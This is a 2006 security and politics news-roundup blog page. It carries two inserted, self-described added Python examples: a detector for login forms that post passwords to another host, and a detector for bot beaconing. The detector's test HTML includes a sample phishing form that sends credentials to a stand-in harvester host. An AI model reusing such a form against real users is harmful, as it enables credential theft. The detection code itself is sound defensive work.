Saturday, October 28, 2006

Getting Ready for Guy Fawkes Day: V for Vendetta




As many of you may already know, V for Vendetta came out on DVD back in August, but if somehow you missed it in its theatrical release, you should really see it on DVD.

I watched it several times, and I am never disappointed -- each time it rocks.

I urge you to see it.

V for Vendetta IMDB.com details here.

U.S. Toll in Iraq

Via The Boston Globe (AP).

As of Saturday, Oct. 28, 2006, at least 2,812 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes seven military civilians. At least 2,254 died as a result of hostile action, according to the military's numbers.

The AP count is four more than the Defense Department's tally, last updated Friday at 1 p.m. EDT.

More here.

And as always, cryptome.org keeps a very, very extensive list here, as does the Iraq Coalition Casualty Count website here.

FBI Returns to 'Fake Boarding Pass' Guy's Home, Seizes Computers - Updated

A bit heavy-handed, methinks.

Via Boing Boing.

Christopher Soghoian today blogs that the FBI returned to his home last night in his absence with a search warrant, and seized computers and other belongings.

The 24-year old computer science student is the creator of a website that generated fake airline boarding passes to illustrate a security flaw which has been documented on the 'net since (at least) 2003.

More here.

Update: More here.

Toon: The Scary Season


Click for larger image.


BBC: Call for Legal Copying of Own CDs

Via The BBC.

Copyright laws are "out of date" and must be updated so MP3 player users can make copies of CDs without breaking the law, according to a think tank.

The Institute for Public Policy Research argues that consumers' rights should be improved with a "new private right to copy".

It is also calling on the government to reject demands for the music copyright term to be extended beyond 50 years.

The IPPR recommendations are ahead of a review of intellectual property laws.

The review of the laws has been commissioned by Chancellor Gordon Brown.

The IPPR report, published on Sunday, says millions of consumers break the law every year by copying CDs and DVDs on to their computers. It is calling for changes to the centuries-old copyright laws.

More here.

Fall Back: Daylight Savings Time Ends Tonight


Don't forget:

At 2 a.m. on October 29, groggy Americans will turn their clocks back one hour, marking the end of Daylight Saving Time (DST).

- ferg

Dilbert: Godwin's Law Every Time


Click for larger image.


Greek Blogger Arrested on Eve of IGF in Athens

Kieren McCarthy writes:

The Internet Governance Forum will start on Monday morning but already the debate has started - and it is surrounding freedom of speech online.

There are several reports that the Greek authorities arrested a man for linking - not writing, but linking - to blog posts that had satirised a businessman (possibly a TV evangelist). The businessman complained to the police and the police picked up the administrator of blog aggregation site blogme.gr - and charged him.

Update: The man arrested was Antonis Tsipropoulos and the target of the satire was Dimosthenis Liakopoulos - a controversial Greek tele-evangelist. The satire site that mocks Mr Liakopoulos can be found at funel.blogspot.com, but since it is hosted in the US, neither the Greek authorities nor even Mr Liakopoulos can get at it.

What Mr Tsipropoulos has been charged with, god only knows. But this is a spectacular own goal by the Greek authorities on the eve of the IGF. Particularly since making a crime of linking to someone else’s content is pure, and legally foolhardy, censorship.

It’s all over the Greek blogosphere, but I can’t understand the majority of it. Except for the fact that there appears to be movement building to protest outside the conference hotel as a statement against the arrest.

More here.

Denver D.A. Issues Computer Security Alert, P2P File Sharing

Via Technology News Daily.

The Denver District Attorney’s Office is issuing an urgent alert to computer users who use file-sharing software, specifically LimeWire.

During the course of a routine identity theft investigation, the Denver Police Department executed a search warrant at a Denver apartment and recovered personal and financial information from approximately 75 different individual and business account names from all over the country. The information, which included tax records, bank account information, online bill paying records and other material, appears to have been stolen directly from computers that were using LimeWire, a filesharing software program.

It appears that the file-sharing program was exploited to enable someone sitting at a computer in Denver to illegally access everything – every file, every document – on computers across the country.

The investigation is continuing, and we are urging people who use LimeWire or other file-sharing software to ensure that their computer security is up to date including adequate firewall security, antivirus software, and other measures.

More here.

U.S. Seen Balking at Challenge by Islamist Web

David Morgan writes for Reuters:

The Bush administration is failing to counter Islamist online propaganda that could propel militancy into the next generation, experts say.

From the Middle East, Asia and Europe, Islamists have built an expansive Internet library of sophisticated texts on the ideology that underpins violence against the West and other enemies, analysts and intelligence officials said.

More here.

Friday, October 27, 2006

MySpace Phishing Attack Appears on 3000 Pages

Kelvin Beecroft writes on Mashable!:

Earlier this week I detected many fake MySpace login pages setup for phishing login credentials. I thought there was something important to report but after further investigation I found that these pages did absolutely nothing because the HTML missed an important attribute in the post form. This is the “action” attribute which tells the form what to do when you click login. “They’ve been neutralized by my MySpace”, I thought. But I was wrong.

A proportion of these pages are today active and will steal your email and password if you give it to them. The fake login pages are very convincing and even fooled Firefox into automatically filling in my credentials. Even cautious Internet users could get caught off guard by this trick.

It appears they then use the compromised accounts to spam other MySpace users via bulletins. But they do more than just send out spam. They also add their fake login code to the compromised pages in a tricky way so that it hides the original page underneath, giving them even more fake login pages.

More here.

EU Data Watchdog: Europe Risks Becoming 'Surveillance Society'

Alan Brackley writes on the Cyprus Observer:

Europeans risk coming under permanent surveillance, if European Union governments continue to meet US demands for access to personal data on their nationals, the EU’s data watchdog has warned.

A recent transatlantic deal on sending key European air passenger data to authorities in the United States “is a slippery slope which shows a lot of ambiguity and leaves room for much interpretation,” European Data Protection Supervisor Peter Hustinx said in an interview with Deutsche Presse-Agentur dpa.

Hustinx, who monitors the processing of personal data by EU institutions, has the power to take cases of privacy infringements to the EU Court of Justice, the bloc’s top legal body. As the data protection supervisor, he acts independently of EU institutions and gives governments and EU bodies advice on security standards.

More here.

(Props, Flying Hampster.)

California Governor Creates Task Force to Spur Broadband

Mary Anne Ostrom writes in The Mercury News:

Saying California lags other states in government policies that promote high-speed Internet access, Gov. Arnold Schwarzenegger Friday signed an executive order to set up a task force to streamline permitting and speed up the construction of broadband networks.

"We have to make sure government is not an obstacle," Schwarzenegger said during a San Francisco medical symposium exploring how to use high-speed Internet connections to diagnose patients in distant locations.

During a press conference, surrounded by executives from Microsoft, Cisco and Juniper Networks, among others, Schwarzenegger cited a three-year-old TechNet study that found that California ranked 14th among 50 states in government policies that encourage broadband. About half of the state's population has access to broadband, mirroring national figures.

More here.

Lawsuit Challenges Google 'Fairness' Rankings

A Reuters newswire article by Eric Auchard, via Yahoo! News, reports that:

A federal judge on Friday questioned whether Google Inc. defamed a small company by cutting it from its Web search ranking system or whether Google is free to choose which sites it features.

Judge Jeremy Fogel of the U.S. District Court for the Northern District of California heard arguments in a lawsuit by KinderStart.com LLC that seeks to challenge the fairness of how Google calculates the relative popularity of Web sites.

More here.

U.S. Toll in Iraq

Via The Boston Globe (AP).

As of Friday, Oct. 27, 2006, at least 2,810 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes seven military civilians. At least 2,254 died as a result of hostile action, according to the military's numbers.

The AP count is two more than the Defense Department's tally, last updated Friday at 1 p.m. EDT.

More here.

And as always, cryptome.org keeps a very, very extensive list here, as does the Iraq Coalition Casualty Count website here.

Local: Suspended SJ Cheerleader Sues School Over MySpace Pics

Via NBC11.com.

A former cheerleader from Leland High School was suspended from the squad after attending a raucous Halloween party two years ago. Now she's suing, NBC11's Stacey Ciauri reported.

The 17-year-old plaintiff, Jaimee Bruno, filed a sex discrimination lawsuit against Leland High School after she alleges that educators selectively suspended five female cheerleaders for attending a 2005 party, but took no action against the male athletes.

Photos from the Halloween party were posted on MySpace, showing the cheerleaders dressed in scantily-clad costumes, along with other students drinking and smoking.

More here.

No Child Left Behind ‘Privacy’ Policy Under Attack

Mike Belt writes in the Lawrence (Kansas) Journal-World:

Buried in the 670 pages of the federal No Child Left Behind law was a requirement that high schools provide lists of students’ names, telephone numbers and addresses to military recruiters.

Students can get off the list if they or their parents notify the school district in writing that they want to opt out.

But there’s a catch. Those who opt off the list find themselves also excluded from the lists provided to college and job recruiters. And opting out also means a student’s name cannot be published in yearbooks, honor rolls or newspapers.

More here.

Botnets Likely Behind Jump in Spam

Robert Lemos writes on SecurityFocus:

A significant rise in the global volume of spam in the past two months has security analysts worried that bot nets are increasingly being used by spammers to stymie network defenses erected to curtail bulk e-mail.

Estimates of the magnitude of the increase in junk e-mail vary, but experts agree that an uncommon surge in spam is occurring. On the low side, Symantec, the owner of SecurityFocus, has found that average spam volume has increased almost 30 percent for its 35,000 clients in the last two months. Others have seen much more significant jumps: Spam black list maintainer Total Quality Management Cubed has seen a 450 percent increase in spam in two months, and the amount of spam filtered out every week by security software maker Sunbelt Software has more than tripled compared to six months ago.

More here.

(Note: Minor quote from me on page 2.)

C|Net: The Worst Political Websites

Website of Rep. Bob Inglis, South Carolina (R)
Image source: InglisForCongress.com / C|Net



C|Net has a humorous look at poorly designed, and just plain non-functional, political websites.

Definitely worth the time to peruse.

As Anne Broache and Declan McCullagh write:

The problem in selecting the most ridiculous, poorly crafted, or just plain bizarre political Web sites is an embarrassment of riches: There are so many worthy contenders.

Link.

Congressman Ed Markey Wants Security Researcher Arrested

Ryan Singel writes on 27B Stroke 6:

Congressman Edward Markey (D-Mass.) wants the federal government to arrest security researcher Christopher Soghoian for creating the Northwest Airline Boarding Pass Generator, a site which lets anyone create a facsimile of a Northwest Airlines boarding pass. Soghoian hoped to spur Congress to look closely at the nation's aviation security policies, which he calls "security theater."

Instead, Markey, a member of the House Homeland Security committee, wants the site shut down and Soghoian arrested.

"The Bush Administration must immediately act to investigate, apprehend those responsible, shut down the website, and warn airlines and aviation security officials to be on the look-out for fraudsters or terrorists trying to use fake boarding passes in an attempt to cheat their way through security and onto a plane," Markey said in a statement. "There are enough loopholes at the backdoor of our passenger airplanes from not scanning cargo for bombs; we should not tolerate any new loopholes making it easier for terrorists to get into the front door of a plane."

Soghoian, a Ph.D. student at Indiana University, says he has never used one of the fake boarding passes, which are likely good enough to get someone past airline security, but not good enough to get you on the plane. He was waiting for clearance from lawyers at Indiana University before attempting to do so.

More here.

Toon: Hallowe'en Spooks


Click for larger image.


Disaster Tech: Bush Signing Statement Asserts Right to Ignore Criteria for FEMA Director

Somehow I missed this when it was first published, but thanks to the folks over at Crooks and Liars... I'm speechless.

Spencer S. Hsu writes in The Washington Post:

President Bush reserved the right to ignore key changes in Congress's overhaul of the Federal Emergency Management Agency -- including a requirement to appoint someone with experience handling disasters as the agency's head -- in setting aside dozens of provisions contained in a major homeland security spending bill this week.

Besides objecting to Congress's list of qualifications for FEMA's director, the White House also claimed the right to edit or withhold reports to Congress by a watchdog agency within the Department of Homeland Security that is responsible for protecting Americans' personal privacy.

More here.

Britain Criticizes U.S. Online Gambling Ban

An AP newswire article by Jane Wardell, via The Washington Post, reports that:

Britain's culture secretary on Friday compared the U.S. crackdown on online gambling to the failed alcohol ban of the Prohibition as she prepared to host an international summit on Internet gambling next week.

Tessa Jowell warned that the U.S. ban on Internet gambling would make unregulated offshore sites the "modern equivalent of speakeasies," illegal bars that opened in 1920s America when alcohol was banned.

More here.

F-Secure: Reselling Domain Names... to Phishing Gangs


Image source: F-Secure

Mikko writes over on the F-Secure "News from the Lab" Blog:

There's a very active aftermarket in domain names. These are domain names that have already been registered and are now being resold. For example, hell.com and auction.com are being auctioned today for highest bidders and they are expected to be sold for several million dollars each.

But most domain names are resold for a few hundred or a few thousand dollars (where the original registration price is typically $5 to $15).

Largest domain resellers include Sedo and Moniker.

There's nothing wrong in reselling cool domains like tractors.com, filmlist.com or 4fares.com to anyone who wants to buy them.

But how about reselling domain that obviously belong to banks or other financial institutions?

More here.

Scottish Call Centers Infiltrated by Organized Crime?

Fiona Raisbeck writes on SC Magazine Online:

One in ten of Glasgow's call centres have been infiltrated by criminal gangs, according to Strathclyde Police.

The organised gangs are said to be planting members inside call centre offices or forcing current workers to reveal sensitive customer data. The details are then used to steal identities and set up accounts or transfer money in laundering scams.

Detectives believe the criminal groups actively recruit volunteers to work in call centres and once they agree they are asked to provide sensitive financial information in return for a fee. Officers suspect the gang members also target innocent employees in pubs and intimidate them to obtain customer data.

More here.

MySpace Accounts Compromised by Phishers

Via Netcraft.

Netcraft has discovered that the social networking site, MySpace, appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form is designed to submit the victim's username and password to a remote server hosted in France.

The hackers have engineered a fake login form on MySpace's own web site.

Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting (XSS) or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

The modified login form, hosted on myspace.com. Login details are harvested by a remote server, hosted in France.

More here.
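Both MySpace items on this page (the Mashable post about fake login forms whose missing action attribute left them inert, and the Netcraft report of a form on myspace.com that posts credentials to a server in France) turn on one question: where does a login form send what the user types? The checker below is an added example, not code from either article, from Netcraft or from MySpace; it parses a page with Python's standard-library HTML parser, finds every form containing a password field and classifies it by where its action resolves relative to the page's own host. The page URL, the harvester host name and the HTML are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormScanner(HTMLParser):
    """Collects every <form> on a page with its action and whether it asks for a password."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute names are already lower-cased by HTMLParser
        if tag == "form":
            self._current = {"action": a.get("action"), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def classify_form(page_url, form):
    """Say where a credential form would send what the user types."""
    if not form["has_password"]:
        return "no-credentials"          # search boxes etc.; not a login form
    action = (form["action"] or "").strip()
    if not action:
        # HTML submits an action-less form to the page's own URL; on a static
        # fake page that captures nothing, which is the inert case the
        # Mashable post describes.
        return "inert"
    target = urlsplit(urljoin(page_url, action))
    if target.scheme not in ("http", "https"):
        return "suspicious-scheme"       # e.g. a javascript: handler
    page_host = (urlsplit(page_url).hostname or "").lower()
    if (target.hostname or "").lower() != page_host:
        # Credentials typed on this host would be posted to another host:
        # the pattern in the Netcraft report. Exact-host comparison is used
        # here; a deployment would normally allow the site's own login hosts.
        return "cross-origin"
    return "same-origin"


def scan_page(page_url, html):
    """Return (classification, raw action) for every form, in document order."""
    scanner = FormScanner()
    scanner.feed(html)
    scanner.close()
    return [(classify_form(page_url, f), f["action"]) for f in scanner.forms]


def exfil_hosts(page_url, html):
    """Distinct foreign hosts that would receive passwords typed on this page."""
    scanner = FormScanner()
    scanner.feed(html)
    scanner.close()
    hosts = []
    for form in scanner.forms:
        if classify_form(page_url, form) == "cross-origin":
            host = urlsplit(urljoin(page_url, form["action"].strip())).hostname.lower()
            if host not in hosts:
                hosts.append(host)
    return hosts


# Constructed sample: a page on the site's own host carrying the genuine login
# form, an action-less fake, an off-site fake and a search box. The page URL
# and the harvester host are placeholders, not values from the reports.
PAGE_URL = "http://www.myspace.com/profile"
SAMPLE_HTML = """
<html><body>
<form action="/login" method="post">
  <input name="email"><input type="password" name="password">
</form>
<form method="post">
  <input name="email"><input type="PASSWORD" name="password">
</form>
<form action="http://credential-harvester.example/collect" method="post">
  <input name="email"><input type="password" name="password">
</form>
<form action="http://search.example/q"><input name="q"></form>
</body></html>
"""

if __name__ == "__main__":
    for verdict, action in scan_page(PAGE_URL, SAMPLE_HTML):
        print(f"{verdict:16} {action}")
    print("posts credentials to:", exfil_hosts(PAGE_URL, SAMPLE_HTML))
```

Run against a saved copy of a page (or a proxy capture), a `cross-origin` verdict on a login form is the signal to investigate; it is exactly what a same-domain phishing form shows that a legitimate one normally does not.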

Amnesty Int.'l Releases API to Access Censored Files

Nick Farrell writes on The Inquirer:

AMNESTY INTERNATIONAL is set to release an API to its data base of politically-censored material from to enable people to develop software to get the information into their own sites and blogs.

The irrepressible.info campaign, launched in May, provides javascript banners featuring censored sites and content. The API will give direct access to the irrepressible.info site’s database of censored material so that supporters can create their own applications to distribute the information better.

Amnesty hopes that someone will come up with ways of making irrepressible.info accessible to social networking sites like MySpace and Bebo, who can't use the Javascript based banner system irrepressible.info runs now.

More here.

MySpace Deletes Sex DVD Comments

Via TheAge.com.au.

Social networking website myspace has deleted the accounts of several users allegedly involved in the production of a DVD at the centre of a rape investigation after other internet users alerted site administrators.

The DVD, which allegedly shows a gang of teenage boys sexually assaulting a girl, then setting her hair on fire and urinating on her, provoked outrage across the country when it was revealed earlier this week.

More here.

Steve Irwin Visits South Park


Image source: Comedy Central / TheAge.com.au


An AAP newswire article, via TheAge.com.au, reports that:

The creators of the South Park cartoon series are unrepentant about a new episode that shows Crocodile Hunter Steve Irwin attending a party in Hell with a stingray barb protruding from his chest.

Irwin died just eight weeks ago when a stingray barb pierced his heart as he was filming off the north Queensland coast.

The South Park episode, which had been scheduled for broadcast in the US on Wednesday, is expected to upset Irwin fans and his family - wife Terri and children Bindi and Bob.

But the show's creators say it's not the first time their work has created waves.

More here.

Australia: Watchdog Warns on Broadband Claims

An AAP newswire article by Xavier La Canna, via Australian IT, reports that:

Australia's competition watchdog has warned telcos racing to offer high-speed internet access not to mislead consumers with false claims about service speeds.

The head of the Australian Competition and Consumer Commission (ACCC) Graeme Samuel issued the warning after an address at a business lunch in Melbourne.

"We are just saying to all the telecommunications companies just be careful, you may be overstepping the mark in terms of misleading and deceptive conduct," Mr Samuel said.

He highlighted companies offering ADSL internet access with potential speeds of 24Mbps, to warn that these speeds are largely unachievable.

More here.

Thursday, October 26, 2006

Politics: Rolling Stone: 'Worst. Congress. Ever.'




Matt Taibbi writes a blistering editorial to accompany this issue of Rolling Stone magazine's Cover Story [above], in which he describes "...how our national legislature has become a stable of thieves and perverts -- in five easy steps."

Really worth a read. Some funny, some satire, some stark & sobering.

One of my favorite opening salvos:

"These past six years were more than just the most shameful, corrupt and incompetent period in the history of the American legislative branch. These were the years when the U.S. parliament became a historical punch line, a political obscenity on par with the court of Nero or Caligula -- a stable of thieves and perverts who committed crimes rolling out of bed in the morning and did their very best to turn the mighty American empire into a debt-laden, despotic backwater, a Burkina Faso with cable."

Blistering.

Link.

Computer With Colorado Human Services Data Stolen

An AP newswire article, via CBS4Denver.com, reports that:

A computer containing personal information of some clients of the Colorado Department of Human Services was stolen from a Dallas-based firm that operates the Family Registry.

The desktop computer, which was stolen during the weekend of Oct. 13, had data on clients who were involved with child support payments. It was stored in a secure area monitored by surveillance cameras accessible only by password, said Dallas-based Affiliated Computer Services Inc.

Company spokesman Kevin Lightfoot said letters were sent to the clients about the theft and advised on how to protect their information.

More here.

U.S. Toll in Iraq

Via The Boston Globe (AP).

As of Thursday, Oct. 26, 2006, at least 2,809 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes seven military civilians. At least 2,254 died as a result of hostile action, according to the military's numbers.

The AP count is one more than the Defense Department's tally, last updated Thursday at 10 a.m. EDT.

More here.

And as always, cryptome.org keeps a very, very extensive list here, as does the Iraq Coalition Casualty Count website here.

Computer Breach at Ohio Children's Hospital

Vic Gideon writes on WKTC.com:

Overseas hackers have apparently accessed two computers at Children's hospital, one containing private patient data, the other billing and bank information.

The hospital is preparing to send out more than 200,000 letters informing patients of the breach. It's also given the F.B.I. information for the investigation.

The hackers apparently were from Germany and used computer loops through France, Turkey, and Canada, eventually landing data from Akron.

"It's absolutely terrifying in this day and age where information is power," says patient Jennifer Ferrick. "Privacy is of the utmost importance in the medical field."

More here.

Did Worm Infect Alaska Candidates' Website?

Anne Broache writes on C|Net News:

If you're a write-in candidate without major political party recognition, there's nothing quite like mysterious malicious software radiating from your Web site to earn you a little extra publicity.

That's what happened this week to Ted and Fran Gianoutsos, a husband-wife team running for governor and lieutenant governor, respectively, in Alaska's race.

Late last week, the candidates' Webmaster logged in to do some updates on the site, only to find that his "firewall went crazy." The problem? A 2-year-old Visual Basic script worm--known variously as Gaggle.D, I-Worm.Gedza and Gedza.A--apparently had wriggled its way into each page of the Gianoutsos' minimalist campaign site at http://www.tedandfran.com/who.htm.

More here.

California Shoppers: Schwarzenegger is Watching You

An AP newswire article, via CNN, reports that:

Gin or vodka? Ford or BMW? Perrier or Fiji water? Does the car you buy or what's in your fridge say anything about how you'll vote?

Gov. Arnold Schwarzenegger's campaign thinks so.

Employing technology honed in President Bush's 2004 victory, the Republican governor's re-election team has created a vast computer storehouse of data on personal buying habits and voter records to identify likely supporters. Campaign officials say the operation is the largest of its kind in any state, at any time.

Some strategists believe consumer information can reveal a voter's politics even better than a party label can.

More here.

Wi-Fi Exploits Coming to Metasploit

Ryan Naraine writes on eWeek:

The Metasploit Project plans to add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool, a move that simplifies the way wireless drivers and devices are exploited.

The controversial open-source project, created and maintained by HD Moore, of Austin, Texas, has added a new exploit class that allows modules to send raw 802.11 frames at one of the most vulnerable parts of the operating system.

More here.

Man Gets 5 Years for Hacking U.S. Army Computers

Dawn S. Onley writes on GCN.com:

A Wichita, Kan., man has received five years in federal prison for hacking into 13 Army computers to steal credit card numbers and account information.

Matthew R. Decker, 21, was sentenced last week, several months after he pleaded guilty to one count of accessing a protected computer and a single count of possession of unauthorized credit card account access devices.

Decker told authorities he used his home computer to illegally access 12 different Army computers on 17 different occasions, from Nov. 21 to Nov. 23, 2003. He stole credit card numbers from 531 Visa and MasterCard account holders, as well as full account information including names, addresses, Social Security numbers, dates of birth, and work and home phone numbers.

The computers Decker hacked into were at Fort Monroe, Va.

More here.

Port Reports Airport Worker Information Missing

Via The Port of Seattle.

The Port of Seattle announced today that six computer disks, containing personal information for 6,939 people who work for employers at Seattle-Tacoma International Airport, are missing. "We have no reason to believe that the information has been misused by anyone," said Mark Reis, managing director at Sea-Tac. "However, we do not know at this time whether the disks were misplaced, or were removed from Port property."

The disks were from the Airport I.D. Badging office, and had been scanned from paper I.D. forms. When it was discovered the disks were missing, the Port immediately conducted an investigation. As a precaution, the Port is sending letters to all individuals with names on the disks. No action is required by the individuals unless they are aware of any suspicious activity regarding their personal financial information; in that case, individuals should contact their financial and credit institutions.

The missing disks are from random dates, ranging from 2001 to early 2006, and carry names of employees from airlines, concessions, the Port and other employers at Sea-Tac. Some of the names may be of former employees.

More here.

DHS Loses Personal Data on 900 Employees

Alex Pulaski writes on The Oregonian:

Federal Homeland Security officials in Portland are trying to find a lost computer storage device that may have held personal information on more than 900 current and former employees.

The device, called a ThumbDrive, turned up missing Oct. 16 at the Transportation Security Administration's command center at Portland International Airport. The agency, born after the Sept. 11 terrorist attacks, has about 500 employees statewide who oversee airport security checkpoints.

Mike Irwin, federal security director at PDX, said the agency had spent the past several days trying to determine what information was on the drive and where it had gone.

More here.

Surveillance System Spots Violent Behavior

Duncan Graham-Rowe writes on NewScientistTech:

Smart surveillance systems capable of automatically detecting violent crimes could soon be available.

A computer vision system developed in the University of Texas in Austin, US, can already tell the difference between friendly behaviour, such as shaking hands, and aggressive actions like punching or pushing.

The hope is that such systems will simplify the task of monitoring huge quantities of CCTV security footage, says Sangho Park, who worked on the project with colleague Jake Aggarwal.

More here.

AllofMP3 Hit by Danish Court Ruling

John Oates writes on The Register:

Much reviled Russian music site allofmp3.com has been hit by a Danish court ruling which forces internet service provider Tele2 to block access to the site.

The Copenhagen City court ruled that Tele2 must do its best to ensure its subscribers cannot access the site. AllofMP3, or iTuneski as it's known round here, insists it is legal but various international royalty groups insist it is not.

The case was brought by the Danish wing of the IFPI.

More here.

AT&T Launches Video Monitoring Service

An AP newswire article by Bruce Meyerson, via USA Today, reports that:

AT&T Inc. is introducing a home monitoring service that includes live video surveillance on a computer or cellphone, as well as lighting controls and detection sensors for motion, temperature changes and flooding.

The service being launched Thursday, priced at $9.95 per month, is compatible with any broadband Internet service. The cellular feature is limited to mobile phones from Cingular Wireless, a majority-owned subsidiary of AT&T, and requires the customer to subscribe to a wireless Internet package costing $10 to $20 a month, on top of voice plan fees.

A customer also needs to buy a $199 equipment package consisting of a tilt-and-pan video camera, a motion sensor for a door or window, a central router to connect those systems to the Internet, and two power-outlet modules that transmit the video between the camera and the router using the home's electrical wiring. Shipping is about $10 extra.

While a wide array of remote surveillance technologies have been available for some time, the AT&T system integrates a variety of capabilities and adds some novel features. There's no need, for example, to leave a home computer running to operate the system.

More here.

Online Documentary Details History of Government Surveillance

Via The ACLU.

From national civil rights activist Julian Bond to an ordinary Middle Eastern mother whose son and husband were imprisoned for a year with no charges brought against them, Tracked in America tells the compelling stories of 25 individuals who have been the targets of government surveillance. The online audio documentary -- launched today by a coalition of human rights, civil rights and educational organizations -- provides an in-depth look at U.S. government surveillance throughout history.

Tracked in America is available online at www.trackedinamerica.org and is being distributed by a broad partnership of groups ranging from the American Civil Liberties Union to the California Federation of Teachers. More than a million individuals make up the combined membership of the coalition.

More here.

Analysis: 'Total Information' Lives Again

Shaun Waterman writes for UPI:

The new U.S. intelligence czar is developing a computer system capable of data-mining huge amounts of information about everyday events to discern patterns that look like terrorist planning.

The technology is reminiscent of the axed Total Information Awareness program.

Civil liberties and privacy advocates criticized the effort, called Tangram, which is being developed by contractors working for the Office of the Director of National Intelligence.

More here.

Firefox 2.0 Releases Privacy Storm

Via Platinax Small Business News.

The most-awaited Firefox 2.0 was launched by the Mozilla Foundation yesterday - and immediately generated a storm of protests over privacy issues.

Key to privacy concerns is that Mozilla have set up their long-awaited phishing protection feature on Firefox 2.0 - but to use it properly, you have to send Google a record of every single website you visit.

A cookie will record all your behaviour data when using Firefox and provide the information free to Google, who can then use that information for their own commercial purposes.

Although the feature does require an explicit opt-in, it's an unwelcome trade-off for many Firefox users, who believe that there is no reason to tie in phishing protection with providing free data to a billion-dollar multinational.

The concerns may be damaging to the Mozilla Foundation - who have long had a close relationship with Google - and who became a “for-profit” business last year.

More here.

(Props, Privacy.org)

Advocacy Group Sues DHS for Profiling

Via UPI.

An advocacy group is suing the U.S. Department of Homeland Security, alleging that they engaged in pre-election profiling of Arab-Americans and Muslims.

The American-Arab Anti Discrimination Committee has brought a Freedom of Information Act case against the department to force disclosure of the nationalities of more than 230 people detained by federal immigration authorities in the days leading up to the 2004 presidential election.

The detentions were part of a pre-election counter-terror push launched in October 2004, dubbed by the media the "October Plan," and called by officials the "Interagency Security Plan."

More here.

Digital Trail Helps Lead To Terror Hoax Suspect

Sharon Gaudin writes on InformationWeek:

The computer that a 20-year-old Wisconsin man used to make an online posting that threatened to detonate radioactive 'dirty bombs' may also have led to his discovery and arrest.

Computer forensics played a key role in the investigation that culminated in the Oct. 20 arrest of Jake J. Brahm of Wauwatosa, Wis. Brahm, who is a grocery store worker, was charged with one count of willfully conveying false information or hoaxes threatening buildings through the use of weapons of mass destruction and radiological dispersal devices. His threat involved setting off bombs in football stadiums in seven states on Oct. 22.

Brahm faces a maximum of five years in federal prison and a $250,000 fine.

More here.

Why So Little Attention to Botnets?

Ed Felten writes over on Freedom to Tinker:

Our collective battle against botnets is going badly, according to Ryan Naraine’s recent article in eWeek.

What’s that? You didn’t know we were battling botnets? You’re not alone. Though botnets are a major cause of Internet insecurity problems, few netizens know what they are or how they work.

In this context, a “bot” is a malicious software agent that gets installed on an unsuspecting user’s computer. Bots get onto computers by exploiting security flaws. Once there, they set up camp and wait unobtrusively for instructions. Bots work in groups, called “botnets”, in which many thousands of bots (hundreds of thousands, sometimes) all over the Net work together at the instruction of a remote badguy.

More here.
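The one thing a bot that "waits unobtrusively for instructions" cannot hide is the habit Felten describes: it checks back with its controller on a schedule. Here is an added example (mine, not from the Freedom to Tinker post) of the beaconing check a network defender would run over outbound-connection logs. The log format, the hosts (10.0.0.7 polling 203.0.113.9:6667 every 60 seconds, 10.0.0.5 browsing irregularly) and the 20% jitter threshold are all constructed for the demo.

```python
"""Added example, not from the original post: flag hosts whose outbound
connections to one destination recur at a near-constant interval, the
signature of a bot polling its command-and-control server.
The log lines, addresses and thresholds below are constructed."""
import re
import statistics
from collections import defaultdict

# Constructed sample log: "<epoch> <src> -> <dst>:<port>".
# 10.0.0.7 beacons to 203.0.113.9:6667 every 60 s; 10.0.0.5 browses irregularly.
SAMPLE_LOG = """\
1000 10.0.0.7 -> 203.0.113.9:6667
1003 10.0.0.5 -> 198.51.100.2:80
1060 10.0.0.7 -> 203.0.113.9:6667
1071 10.0.0.5 -> 198.51.100.2:80
1120 10.0.0.7 -> 203.0.113.9:6667
1122 10.0.0.5 -> 198.51.100.2:80
1180 10.0.0.7 -> 203.0.113.9:6667
1240 10.0.0.7 -> 203.0.113.9:6667
1300 10.0.0.5 -> 198.51.100.2:80
1310 10.0.0.5 -> 198.51.100.2:80
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+->\s+(\S+)$")


def parse_log(text):
    """Return {(src, dst): [timestamps]} from the constructed log format."""
    flows = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:          # skip blank or malformed lines
            continue
        ts, src, dst = int(m.group(1)), m.group(2), m.group(3)
        flows[(src, dst)].append(ts)
    return flows


def find_beacons(text, min_connections=4, max_jitter=0.2):
    """Return (src, dst, period, jitter) for flows whose gaps are nearly constant.

    jitter = stdev(gaps) / mean(gaps).  A bot polling every N seconds scores
    close to 0; a person clicking around scores well above the threshold.
    min_connections keeps a handful of coincidental hits from being flagged.
    """
    flagged = []
    for (src, dst), stamps in parse_log(text).items():
        if len(stamps) < min_connections:
            continue
        stamps = sorted(stamps)
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = float(statistics.mean(gaps))
        if mean == 0:      # all connections in the same second: not a beacon
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            flagged.append((src, dst, round(mean, 1), round(jitter, 3)))
    return flagged


if __name__ == "__main__":
    for src, dst, period, jitter in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {src} -> {dst} every ~{period}s (jitter {jitter})")
```

Real bots add random sleep to their check-in interval, so in practice the jitter threshold is tuned per network and combined with other signals (destination reputation, odd ports, identical request sizes); the point of the check is that regularity is hard to remove entirely without breaking the bot's responsiveness to its controller.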

Researchers Criticize Security of Windows Mobile

Matt Hines writes on eWeek:

